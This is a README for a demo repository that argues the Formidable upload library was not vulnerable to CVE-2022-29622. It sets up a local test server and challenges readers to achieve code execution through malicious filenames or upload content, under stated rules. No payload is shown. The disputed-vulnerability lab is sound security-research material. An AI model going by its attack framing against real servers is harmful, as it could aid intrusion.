CVE-2022–29622: (In)vulnerability Analysis
This codebase was created to help security professionals and developers to understand why I think Formidable was not vulnerable to CVE-2022-29622. I have written up my analysis here:
https://medium.com/@zsolt.imre/cve-2022-29622-in-vulnerability-analysis-5cf783c3721
As some did not understand it, I thought I will illustrate my point using actual, running code.
The Server
The server is implemented in index.mjs
. It uses Formidable version 3.1.4
to upload any file of your choosing.
I explicitly configured Formidable as shown below:
{
uploadDir: './uploads/',
keepExtensions: true,
}
This way, all files will be uploaded to the uploads
directory. I have enabled keepExtension
so you can get your files with a malicious filename uploaded.
Starting the Server
To set up and start the server, issue the following commands from this directory:
npm install
npm run start
The first command installs all dependencies, including the appropriate version of formidable. The second command will start the server.
Once up and running, you can access the file upload form exposed by the server at: http://127.0.0.1:3000/
Upload a Malicious File
I have included two files with malicious name in the examples
directory... as examples.
Files submitted using the form at http://127.0.0.1:3000 will get uploaded to the uploads
directory.
CHALLENGE
The challenge is to see if you can prove that formidable
is vulnerable to CVE-2022–29622. To be able to do that, you have to get this web server to execute code that you include in the uploaded file or in the name of the file.
The rules:
- You are allowed to put your malicious payload in the file or within the file's name. (Similar to the examples I have provided.)
- You are allowed to tamper with parts of the HTTP request that are related to file upload. (e.g.: multipart body, content-type, boundary string)
- The only acceptable attack surface is port
3000
. You MUST NOT modify any files within this directory.
If you can get arbitrary code executed by strictly following the above rules, only then you have proved that formidable
was vulnerable to arbitrary code execution.
Suggestion: Probably the simplest visual demostration would be to get the server to print out a string, for example, "I'm awesome, I've got arbitrary code executed" on the console where you started the web server.